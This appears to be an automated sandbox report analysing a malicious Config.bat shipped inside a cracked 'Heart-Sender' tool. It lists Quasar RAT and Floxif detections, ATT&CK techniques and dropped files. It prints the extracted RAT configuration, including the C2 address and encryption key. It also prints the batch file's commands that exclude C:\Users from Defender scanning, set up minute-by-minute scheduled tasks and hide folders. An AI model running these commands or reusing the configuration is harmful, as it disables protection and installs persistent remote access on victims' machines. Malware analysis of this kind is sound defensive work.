floxif | d89a2246c6db2ec558bce3f1b3ca0cf32eb7dd9905b1ff30f802732434254c93

Analysis

max time kernel
147s
max time network
145s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-11-2024 12:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Config.bat
Size

580B
MD5

028f22a9de1e96042ba3c22231565d7f
SHA1

644f9c79a0338fd1073b66fcf5a96851c0c06ad6
SHA256

cae2e9ddb120b89bb863815fbee0eeb597f576ec442242a87795244d2c2c8042
SHA512

711a649a2e906c31997fe3d1f9f6fffa3bdd36118c9e11a0fd8acc7b662656d9c63db7f7e8a6c64240b78cbdc22594d1863042911057f539dadebb05c03c9d8b

Score

10^/10

floxif quasar heart backdoor discovery execution persistence privilege_escalation spyware trojan upx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Heart

185.163.127.20:61110

Mutex

HRT_MUTEX_kecTsVDPnERdvianlr

Attributes

encryption_key
3vnM9JqtaSdxUVqeTXSi
install_name
Subfile.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDirr

Signatures

Floxif family
floxif
Floxif, Floodfix
Floxif aka FloodFix is a file-changing trojan and backdoor written in C++.
backdoor trojan floxif
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0005000000019241-45.dat	family_quasar
behavioral1/memory/2276-53-0x0000000000B30000-0x0000000000B8E000-memory.dmp	family_quasar

Detects Floxif payload 1 IoCs

backdoor

Processes:

resource	yara_rule
behavioral1/files/0x000500000001920f-21.dat	floxif

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
1288	powershell.exe
1052	powershell.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
behavioral1/files/0x000500000001920f-21.dat	acprotect

Executes dropped EXE 2 IoCs

Processes:

Subfile.exeSys32.exe

pid	Process
2276	Subfile.exe
2300	Sys32.exe

Loads dropped DLL 4 IoCs

Processes:

Loader.exeLoader1.exeSubfile.exe

pid	Process
2976	Loader.exe
2636	Loader1.exe
2636	Loader1.exe
2276	Subfile.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Subfile.exe

description	ioc	Process
File opened (read-only)	\??\e:	Subfile.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
4	ip-api.com

UPX packed file 18 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2976-19-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/files/0x000500000001920f-21.dat	upx
behavioral1/memory/2976-23-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2976-29-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2976-30-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2636-35-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2636-34-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/files/0x0005000000019234-37.dat	upx
behavioral1/memory/2636-42-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2636-44-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2276-50-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/files/0x0006000000019234-52.dat	upx
behavioral1/memory/2276-57-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2276-60-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2276-63-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2276-66-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2276-69-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/2276-72-0x0000000010000000-0x0000000010030000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

Processes:

Loader.exeSubfile.exe

description	ioc	Process
File created	C:\Program Files\Common Files\System\symsrv.dll	Loader.exe
File created	\??\c:\progra~1\common~1\system\symsrv.dll.000	Subfile.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Subfile.exeLoader.exeLoader1.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Subfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Loader1.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exe

pid	Process
2820	schtasks.exe
2424	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Sys32.exe

pid	Process
2300	Sys32.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

Loader.exeLoader1.exe

pid	Process
2976	Loader.exe
2636	Loader1.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exeSubfile.exe

pid	Process
1288	powershell.exe
1052	powershell.exe
2276	Subfile.exe
2276	Subfile.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exeLoader.exeLoader1.exeSubfile.exe

description	pid	Process
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	2976	Loader.exe
Token: SeDebugPrivilege	2636	Loader1.exe
Token: SeDebugPrivilege	2276	Subfile.exe
Token: SeDebugPrivilege	2276	Subfile.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Subfile.exe

pid	Process
2276	Subfile.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

cmd.exetaskeng.exe

description	pid	Process	procid_target
PID 2384 wrote to memory of 1288	2384	cmd.exe	29
PID 2384 wrote to memory of 1288	2384	cmd.exe	29
PID 2384 wrote to memory of 1288	2384	cmd.exe	29
PID 2384 wrote to memory of 1052	2384	cmd.exe	30
PID 2384 wrote to memory of 1052	2384	cmd.exe	30
PID 2384 wrote to memory of 1052	2384	cmd.exe	30
PID 2384 wrote to memory of 2820	2384	cmd.exe	31
PID 2384 wrote to memory of 2820	2384	cmd.exe	31
PID 2384 wrote to memory of 2820	2384	cmd.exe	31
PID 2384 wrote to memory of 2424	2384	cmd.exe	32
PID 2384 wrote to memory of 2424	2384	cmd.exe	32
PID 2384 wrote to memory of 2424	2384	cmd.exe	32
PID 2384 wrote to memory of 2684	2384	cmd.exe	33
PID 2384 wrote to memory of 2684	2384	cmd.exe	33
PID 2384 wrote to memory of 2684	2384	cmd.exe	33
PID 2384 wrote to memory of 2976	2384	cmd.exe	34
PID 2384 wrote to memory of 2976	2384	cmd.exe	34
PID 2384 wrote to memory of 2976	2384	cmd.exe	34
PID 2384 wrote to memory of 2976	2384	cmd.exe	34
PID 2384 wrote to memory of 2976	2384	cmd.exe	34
PID 2384 wrote to memory of 2976	2384	cmd.exe	34
PID 2384 wrote to memory of 2976	2384	cmd.exe	34
PID 2384 wrote to memory of 2636	2384	cmd.exe	35
PID 2384 wrote to memory of 2636	2384	cmd.exe	35
PID 2384 wrote to memory of 2636	2384	cmd.exe	35
PID 2384 wrote to memory of 2636	2384	cmd.exe	35
PID 2384 wrote to memory of 2636	2384	cmd.exe	35
PID 2384 wrote to memory of 2636	2384	cmd.exe	35
PID 2384 wrote to memory of 2636	2384	cmd.exe	35
PID 1800 wrote to memory of 2300	1800	taskeng.exe	40
PID 1800 wrote to memory of 2300	1800	taskeng.exe	40
PID 1800 wrote to memory of 2300	1800	taskeng.exe	40
PID 1800 wrote to memory of 2276	1800	taskeng.exe	39
PID 1800 wrote to memory of 2276	1800	taskeng.exe	39
PID 1800 wrote to memory of 2276	1800	taskeng.exe	39
PID 1800 wrote to memory of 2276	1800	taskeng.exe	39

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
2684	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Config.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath "C:\Users" -force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1052
- C:\Windows\system32\schtasks.exe
  schtasks /create /sc minute /mo 1 /tn "Microsoft\SubDir\Subfile0" /tr "C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe" /RL HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2820
- C:\Windows\system32\schtasks.exe
  schtasks /create /sc minute /mo 1 /tn "Microsoft\SubDir\Subfile1" /tr "C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe" /RL HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2424
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\SubDirr
  2⤵
  - Views/modifies file attributes
  PID:2684
- C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Loader.exe
  loader.exe -pP@$$W@RD@@
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2976
- C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Loader1.exe
  loader1.exe -pP@$$W@RD@@
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2636

C:\Windows\system32\taskeng.exe
taskeng.exe {C3777CD3-CD48-4C43-84BC-28701C255F07} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1800
- C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
  C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2276
- C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
  C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  PID:2300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PROGRA~1\COMMON~1\System\symsrv.dll.000

Filesize
175B

MD5
1130c911bf5db4b8f7cf9b6f4b457623

SHA1
48e734c4bc1a8b5399bff4954e54b268bde9d54c

SHA256
eba08cc8182f379392a97f542b350ea0dbbe5e4009472f35af20e3d857eafdf1

SHA512
94e2511ef2c53494c2aff0960266491ffc0e54e75185427d1ccedae27c286992c754ca94cbb0c9ea36e3f04cd4eb7f032c551cf2d4b309f292906303f1a75fa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\A1D26E2\8F168BCBA0.tmp

Filesize
216KB

MD5
a0f5d9448eed029fef6d9944df015832

SHA1
560dc39fbdccf26465005baf60648d3e0e41b32a

SHA256
02d46c7d93d8be4e82fd29d9452203f86d75476dbfcc952efa63360a260fb242

SHA512
c41251267d6c42aa916df9e15304e839b0cb9087c834c9aa2a3b912b91c67ba1804e0a1854c64b14654d9ead03e1ed0e4a4ca3a4fd87616f7ad47c8edcec12d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\A1D26E2\903E9C4A4C.tmp

Filesize
71KB

MD5
cb12a9883105636361815cc05ae84a9b

SHA1
e200f1b9553254dac2771c11e9c7eaf39095803c

SHA256
fb6f81aaf1dbe4cf4a182b2f049504c2b137cf714eacddf8debc7087d52414e7

SHA512
36dd29e931d771802e4f39ece4cb3ab6bff777457304d3242b88189ebd8a2650a68dba2b100309f6a5962af2d92416f91f0ad0e323e98d7276b2ecec0c657fec

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
dc34e8dc89b827cc49d20ad935518aa3

SHA1
b2affff79279ba13d4ad2ed25513c997cc3735fc

SHA256
e0ff18ea9f9513257f0fe92c617e6eb330ceab9382f60322c0067060a16cd362

SHA512
b097a382c247be9d0a2cd10ef5df1a71fb768e9feda65a49952b791b4204f91e9d3c33dcf691e268dd0fa03955a99cf1d9ae8bb4e1e11aa21a7b70fcec967f92

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe

Filesize
348KB

MD5
3e5da207d7655d267515b8fd7fe35b8a

SHA1
85a81b28b919d283c7ae1df1a6c8c45dc0ff756a

SHA256
db4b1a7399ad2e1fc3d8e64cb9e870a4b7f36ef629614517942a4b7318c29f42

SHA512
f097cfdaa714fe1dfcb360467010597015ba1ff4ca686d340d1775bdeadbe02d4d9ec064d78e20add0c29bd4f06f8ef9ee572f2374031a6313af2f7602c0530d

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe

Filesize
7KB

MD5
4fb7326fe1263d2f0626ee186195b891

SHA1
f2ceda16fe3ba9e90e2b17f77879278923fb3fe9

SHA256
d4641707fb9daa4f2e4e30f869a968f022f98c1067a9d8a9bd21ab22e56f82f4

SHA512
f4191396b94e1517af938a9ca6068686956e99b2bde98ed6dccc14c05ecf016c11a75010c5e911a52524886e9404cb001d68832230b15d455fab514ddd9fce7a

Download Submit
\Program Files\Common Files\System\symsrv.dll

Filesize
67KB

MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
memory/1052-17-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/1052-18-0x00000000002E0000-0x00000000002E8000-memory.dmp

Filesize
32KB

Download
memory/1288-7-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1288-8-0x0000000002B74000-0x0000000002B77000-memory.dmp

Filesize
12KB

Download
memory/1288-9-0x0000000002B7B000-0x0000000002BE2000-memory.dmp

Filesize
412KB

Download
memory/1288-10-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1288-11-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1288-4-0x000007FEF5ACE000-0x000007FEF5ACF000-memory.dmp

Filesize
4KB

Download
memory/1288-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/1288-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2276-50-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2276-63-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2276-72-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2276-69-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2276-66-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2276-60-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2276-57-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2276-53-0x0000000000B30000-0x0000000000B8E000-memory.dmp

Filesize
376KB

Download
memory/2300-54-0x0000000001180000-0x0000000001188000-memory.dmp

Filesize
32KB

Download
memory/2636-36-0x0000000000380000-0x00000000003B0000-memory.dmp

Filesize
192KB

Download
memory/2636-34-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2636-44-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2636-42-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2636-35-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2976-23-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2976-29-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2976-30-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2976-19-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download